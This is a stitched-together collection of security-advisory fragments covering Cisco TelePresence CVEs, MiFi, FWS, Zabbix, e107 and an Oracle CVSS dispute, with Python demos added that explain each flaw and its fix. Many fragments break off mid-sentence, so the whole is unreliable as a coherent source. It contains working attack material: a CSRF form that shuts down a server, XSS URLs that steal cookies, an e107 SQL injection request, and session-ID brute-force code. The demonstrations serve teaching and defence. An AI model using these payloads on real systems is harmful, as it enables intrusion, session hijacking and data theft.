vulnerability, the attacker would need the ability to submit a
crafted request to an affected device on TCP port 80, TCP port 443,
or TCP port 8080.
An attacker must perform a three-way TCP handshake and establish a
valid session to exploit these vulnerabilities.
* Cisco TelePresence Recording Server - CSCtf42005 (registered
customers only) has been assigned the CVE identifier
CVE-2011-0383.
restricted to administrative users only. The attacker would need the
ability to submit a crafted request to an affected device on TCP port
80, 443, or 8080.
An attacker must perform a three-way TCP handshake and establish a
valid session to exploit these vulnerabilities.
* CTMS - CSCtf42008 (registered customers only) has been assigned
the CVE identifier CVE-2011-0383.
* CTMS - CSCtf01253 (registered customers only) has been assigned
the CVE identifier CVE-2011-0384.
authenticated attacker to execute arbitrary commands with elevated
privileges. To exploit these vulnerabilities, an attacker must submit
a malformed request to an affected device via TCP port 8082.
An attacker must perform a three-way TCP handshake and establish a
valid session to exploit this vulnerability.
* Cisco TelePresence endpoint - CSCtb31640 (registered customers
only) has been assigned the CVE identifier CVE-2011-0372.
CGI Command Injection
The attacker would need the ability to submit a malformed SOAP
request that is designed to trigger the vulnerability to the affected
device on TCP port 8080 or 8443.
An attacker must perform a three-way TCP handshake and establish a
valid session to exploit this vulnerability.
* Cisco TelePresence Manager - CSCtc59562 (registered customers
only) has been assigned the Common Vulnerabilities and Exposures
(CVE) identifier CVE-2011-0380.
Take for example the bug APPS01[1] in the Oracle Critical Patch Update of
April 2007 [2]: it was a preauthenticated remote bug (by remote I mean
"from the internet", not from an "adjacent network"). The CVSS2 score would be 9/10
(calculate it yourself [3]); however, the Oracle advisory says that a
"valid session" was needed and that the CVSS2 score was 4.2. It's funny.
>As a responsible security professional, I have to assume their research
>is accurate and their advisory should be taken more seriously than
>Oracle's.
Details
*******
Exploiting this issue may allow a remote attacker to perform certain administrative actions (e.g. change the web administration password, upload applications) using predictable URL requests, once the user has authenticated and obtained a valid session with the server.
Example [Shutdown Server]:
<html>
<form action='http://[server]/console/portal//Server/Shutdown/__ac0x3console-base0x2ServerManager!-1172254814|0' id=1>
</form>
</html>
vendor lag but it's not all that complicated if you have a MiFi and a
few minutes.
*1. Authentication not required.*
The MiFi does not require a valid session to commit changes to
configuration settings. This makes the issues below much easier to
exploit, because the victim does not need to be logged in.
*2. Enable GPS without the user's knowledge.*
random values using the Mersenne Twister algorithm. FWS seeds mt_rand()
with the current time every time create_sessionid() is called, and
mt_rand() produces the same sequence of values whenever it is given the
same seed. Since the attacker can determine the current time, it is
possible to generate the exact same session identifiers. Consequently, an
attacker is able to calculate valid session identifiers, which allows the
attacker to manipulate another user's cart.
includes/readcookie.inc.php:
function create_sessionid($length)
1) XSRF
An attacker may exploit this issue to perform certain administrative actions
(e.g. configuration changes) using predictable URL requests once the user has
authenticated and obtained a valid session with the switch.
Example
*******
Session IDs are timestamps of when the user logged in and are trivial to
forge. There are numerous ways of remotely gathering the remote time and
uptime, the easiest being to ask over RPC. Assuming that a user or an
administrator logged into the device shortly after it was powered up, and
that the network connectivity is fast, it is practical to brute-force a
valid session ID.
Using this vulnerability, a non-authenticated attacker can authenticate.
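The two weaknesses described above (FWS reseeding mt_rand() with the time on every create_sessionid() call, and a device whose session IDs are login timestamps) are the same attack: the identifier is a function of a time value the attacker can narrow to a small window, so the attacker regenerates every candidate in that window and tries each one. The Python below is an added example and is not FWS's or the device's own code. Its create_sessionid(), the 36-character alphabet, the login time, and the clock-error and window figures are constructed for the demo; Python's random module is also MT19937 but seeds it differently from PHP's mt_srand(), so the IDs will not match a real FWS install. The timestamp-as-session-ID case is the degenerate form, where the candidate set is just the timestamps in the window with no PRNG step.

```python
import random
import secrets
import string

ALPHABET = string.ascii_lowercase + string.digits

# Constructed demo state: the second at which the victim logged in. The
# attacker does not know it exactly, only the server's approximate clock.
TRUE_LOGIN_TIME = 1279796468


def create_sessionid(length, now):
    """Flawed server: the PRNG is reseeded with the current time on every
    call, so the id is a pure function of `now`. (Python's random is MT19937
    too, but seeded differently from PHP's mt_srand(); this reproduces the
    technique, not FWS's exact output.)"""
    rng = random.Random(now)
    return "".join(rng.choice(ALPHABET) for _ in range(length))


def create_sessionid_secure(nbytes=16):
    """Hardened: draw from the OS CSPRNG; there is no seed to guess."""
    return secrets.token_hex(nbytes)


def predict_sessionids(length, approx_now, window):
    """Attacker: regenerate the id for every seed within +/- window seconds
    of the estimated server time. Returns {seed: candidate_id}."""
    return {t: create_sessionid(length, t)
            for t in range(approx_now - window, approx_now + window + 1)}


def bruteforce_session(is_valid, candidates):
    """Try candidates against the server (here an oracle callable) until one
    is accepted. Returns (seed, session_id) or None if none is accepted."""
    for t in sorted(candidates):
        if is_valid(candidates[t]):
            return t, candidates[t]
    return None


def demo(clock_error=7, window=30):
    """Victim logs in at TRUE_LOGIN_TIME; the attacker's estimate of the
    server clock is off by `clock_error` seconds and searches +/- window."""
    issued = create_sessionid(32, TRUE_LOGIN_TIME)
    server_sessions = {issued}          # what the server would accept
    candidates = predict_sessionids(32, TRUE_LOGIN_TIME + clock_error, window)
    return bruteforce_session(server_sessions.__contains__, candidates)


if __name__ == "__main__":
    print(demo())
```

With a 7-second clock error and a 61-seed window the search needs at most 61 requests; widening the window only grows that count linearly, which is why reading the remote time or uptime first (as the advisory above suggests, over RPC) is the attacker's main job.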
- - Usage of cookies to store credentials
I. BACKGROUND
"ZABBIX is an enterprise-class open source distributed monitoring solution." [1]
II. DETAILS
Multiple Cross-Site Request Forgery (CSRF) vulnerabilities exist that allow the following
attack scenarios to be executed should an administrator with a valid session visit a malicious page
or URL.
1. Reset admin password
2. Execution of shell commands
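Each CSRF issue on this page (the console shutdown form, the switch's predictable URL actions, and the Zabbix administrator scenarios) works for the same reason: the application's only authorization check is "the request arrived with a valid session cookie", and the browser attaches that cookie to a cross-site form post by itself, so a valid session is exactly what the attacker is relying on. The Python below is an added example, not code from any of those products. It models a constructed AdminConsole with two state-changing URLs (the shutdown path follows the form above; the password-change path and the cookie name are assumed), the request a victim's browser would send when a malicious page auto-submits a form, and the same handler with a per-session token check added.

```python
import hmac
import secrets


class Session:
    def __init__(self, user):
        self.user = user
        # Per-session secret that the hardened handler demands in every
        # state-changing form. A cross-site page cannot read it.
        self.csrf_token = secrets.token_hex(16)


class Request:
    def __init__(self, method, path, cookies, form):
        self.method = method
        self.path = path
        self.cookies = cookies
        self.form = form


class AdminConsole:
    """Constructed stand-in for a web admin console with two state-changing
    actions reached by predictable URLs (password path and cookie name assumed)."""
    SHUTDOWN = "/console/portal/Server/Shutdown"
    PASSWORD = "/console/portal/Security/ChangePassword"

    def __init__(self, require_csrf_token):
        self.require_csrf_token = require_csrf_token
        self.sessions = {}
        self.admin_password = "initial"
        self.is_shut_down = False

    def login(self):
        sid = secrets.token_hex(16)
        self.sessions[sid] = Session("admin")
        return sid

    def handle(self, req):
        # Vulnerable behaviour: a valid session cookie is the whole check.
        sess = self.sessions.get(req.cookies.get("ADMINSESSION"))
        if sess is None:
            return 401
        if req.method != "POST":
            return 405
        # Hardened behaviour: the form must also carry the session's token.
        if self.require_csrf_token:
            token = req.form.get("csrf_token", "")
            if not hmac.compare_digest(token, sess.csrf_token):
                return 403
        if req.path == self.SHUTDOWN:
            self.is_shut_down = True
            return 200
        if req.path == self.PASSWORD:
            self.admin_password = req.form["new_password"]
            return 200
        return 404


def forged_request(victim_sid, path, form):
    """What the victim's browser sends when a malicious page auto-submits a
    form at the console: the session cookie rides along automatically, but
    the attacker cannot read the token out of the victim's page, so it is absent."""
    return Request("POST", path, {"ADMINSESSION": victim_sid}, dict(form))


def legitimate_request(console, sid, path, form):
    """A form rendered by the console itself carries the session's token."""
    form = dict(form)
    form["csrf_token"] = console.sessions[sid].csrf_token
    return Request("POST", path, {"ADMINSESSION": sid}, form)


def run_attack(require_csrf_token):
    """Admin logs in, then visits the attacker's page, which posts to both
    URLs. Returns (shutdown status, password-change status, console)."""
    console = AdminConsole(require_csrf_token)
    sid = console.login()
    s1 = console.handle(forged_request(sid, AdminConsole.SHUTDOWN, {}))
    s2 = console.handle(forged_request(sid, AdminConsole.PASSWORD,
                                       {"new_password": "pwned"}))
    return s1, s2, console


if __name__ == "__main__":
    print(run_attack(require_csrf_token=False)[:2])   # both succeed
    print(run_attack(require_csrf_token=True)[:2])    # both rejected
```

The token check is the minimum; an Origin/Referer check or SameSite cookies add defence in depth, but neither replaces binding the action to something the cross-site page cannot obtain.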
etc. from "false" to "true" an attacker is able to unlock "hidden"
features and e.g. is able to manipulate other profiles on the index page
(other profiles can be deleted!).
3) XSS (valid session necessary, payload will be auto-executed after
login)
http://$host/?dp=reports&p=testprofile&wbsi=";alert(document.cookie);//
http://$host/?dp=reports&p=testprofile&rii=";alert(123);//&wbsi=1279796468489657
Unauthenticated XSS:
An attacker can use a browser to exploit this vulnerability. The following PoC code is available:
POST /e107_admin/users_extended.php?cat= HTTP/1.1
Host: HOST
Cookie: <valid session cookies>
Content-Type: application/x-www-form-urlencoded
Content-Length:
user_field=sss','',0, ','','', '0', '253','0','0','253','0','0'),('0',(select user()),'',0,'','','','0','253','0','0','253','0','0'),('0','dfg&user_applicable=253&user_read=0&user_write=253&add_category=Add+category
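The user_field payload above works by closing the quoted string and the VALUES tuple the handler built, appending a tuple of the attacker's own whose second value is a subselect, then reopening a tuple so that the handler's remaining values still parse. The Python below is an added example, not e107's code: an assumed four-column table ext_field replaces e107's real schema, sqlite_version() stands in for MySQL's user() since the demo runs on SQLite, and the string-interpolating handler is placed next to its parameterised replacement.

```python
import sqlite3

# Assumed table for the demo; this is not e107's real schema.
SCHEMA = ("CREATE TABLE ext_field ("
          "name TEXT, applicable INTEGER, read_perm INTEGER, write_perm INTEGER)")


def add_field_vulnerable(conn, name, applicable, read_perm, write_perm):
    """Builds the INSERT by string interpolation, as the vulnerable handler
    effectively does: a quote in `name` closes the value and the tuple."""
    sql = ("INSERT INTO ext_field (name, applicable, read_perm, write_perm) "
           "VALUES ('%s', '%s', '%s', '%s')" % (name, applicable, read_perm, write_perm))
    conn.execute(sql)
    return sql


def add_field_safe(conn, name, applicable, read_perm, write_perm):
    """Parameterised INSERT: the payload is stored as an ordinary string."""
    sql = ("INSERT INTO ext_field (name, applicable, read_perm, write_perm) "
           "VALUES (?, ?, ?, ?)")
    conn.execute(sql, (name, applicable, read_perm, write_perm))
    return sql


# Same shape as the page's user_field payload, cut down to four columns and
# with sqlite_version() standing in for MySQL's user(): close the tuple, add
# a row whose name is the result of a subselect, then reopen a tuple so the
# handler's trailing values still parse.
PAYLOAD = "sss','253','0','0'),((select sqlite_version()),'253','0','0'),('dfg"


def demo(add_field):
    """Run one handler against an in-memory database and return the stored
    names in insertion order."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    add_field(conn, PAYLOAD, 253, 0, 253)
    return [row[0] for row in conn.execute("SELECT name FROM ext_field ORDER BY rowid")]


def engine_version():
    """What the injected subselect evaluates to on this engine."""
    return sqlite3.sqlite_version


if __name__ == "__main__":
    print(demo(add_field_vulnerable))   # three rows, middle one is the subselect result
    print(demo(add_field_safe))         # one row, the payload stored literally
```

Because the leaked value lands in a column the attacker can read back through the application (the field list on the admin page), this is a classic second-order read: no error messages or timing are needed.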